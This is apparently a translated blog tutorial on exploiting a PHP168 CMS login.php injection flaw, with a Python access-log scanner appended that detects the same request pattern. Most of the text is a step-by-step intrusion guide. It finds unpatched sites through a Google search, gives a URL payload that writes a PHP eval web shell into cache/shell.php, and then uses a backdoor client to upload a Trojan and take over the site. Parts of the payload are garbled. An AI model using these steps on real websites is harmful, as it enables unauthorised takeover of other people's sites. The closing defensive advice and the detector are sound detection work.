The procedure in this article is simple and can be completed by following the steps one at a time. On many websites, entering ' or ' = ' in the back-end login box was once enough to log in to the site back end directly, and this was the most popular intrusion method at the time. Today Lu Songsong covers how a vulnerability in the back-end login file is used to inject code.
login.php (.asp/.aspx) is generally the file a CMS administrator uses to log in to the back end. Taking the PHP168 CMS as an example, the login.php vulnerability is in fact an injection vulnerability: poorly designed code in the file allows malicious code to be written directly into the site directory. The vulnerability can be used to break into the website, manipulate its content, plant malicious code in its pages ("web page hanging horse") and so on.
Step one: find a website that uses PHP168 CMS
Enter "Powered by php168" in Google and pick a website as a test, the point being to find a site that has not been patched. Then append the following after the domain name, for example: http://lusongsong.com/login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache& Content=<?php%[email protected] ($_post[cmd]);? > If a login interface appears, the vulnerability has been exploited successfully. (Replace the domain name used in this article with the domain name of the site found by searching.)
Step two: read the site directory and get the absolute path of the website
If the code executes successfully, the Trojan is saved in the cache\shell.php file. Then download a "Lanker Mini PHP Backdoor Client", enter http://lusongsong.com/cache/shell.php in the Trojan address field, and choose to read the directory. If the connection succeeds, the absolute path of the site on the server is displayed.
Step three: upload a PHP web Trojan
In the basic features list of the Lanker mini PHP backdoor client, select Upload Web Trojan; the uploaded file is saved in the cache directory. Entering "cache/website Trojan file name" after the domain name runs the Trojan. At this point control of the website running the PHP168 CMS has been obtained, and its content can be modified and deleted arbitrarily.
In fact, PHP168 is not the only system with a login injection vulnerability; the source code of many lesser-known PHP websites has the same flaw. If you are running a PHP system, check promptly whether your program has this problem. Webmasters who are not familiar with PHP can scan their site with a PHP injection vulnerability scanning tool such as CASI, PHP-MySQL Injection Analyzer or ZBSI. For more detail, search Google for "How to prevent and detect the Web page hanging horse."
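One way to check your own site for traces of the request pattern described above, as an added example that is not part of the original article: it scans a web server access log for login.php requests that combine makehtml with a script file name or PHP content, and for scripts requested from the cache directory. The combined log format, the function names classify and scan, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=%3C%3Fphp+PLACEHOLDER%3B%3F%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "POST /cache/shell.php HTTP/1.1" 200 64 "-" "-"
198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /cache/index.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client IP, method, request target, status from a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# file extensions a web server would execute rather than serve as static HTML
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|asp|aspx)$", re.I)


def classify(line):
    """Return (client_ip, reason) if the line matches the pattern, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, _method, target, _status = m.groups()
    url = urlsplit(target)
    # parse_qs percent-decodes keys and values, so chdb%5Bhtmlname%5D also matches
    params = parse_qs(url.query, keep_blank_values=True)
    path = url.path.lower()
    if path.endswith("/login.php") and "makehtml" in params:
        name = params.get("chdb[htmlname]", [""])[0]
        body = params.get("content", params.get("Content", [""]))[0]
        if SCRIPT_EXT.search(name) or "<?" in body:
            return ip, "login.php makehtml write of script file " + repr(name)
    # the static-page cache directory should never serve executable scripts
    if path.startswith("/cache/") and SCRIPT_EXT.search(path):
        return ip, "script requested from cache directory: " + url.path
    return None


def scan(log_text):
    """Classify every line of a log and return only the hits, in order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

Any hit from a real log is a reason to inspect the cache directory for script files and to confirm the CMS is patched.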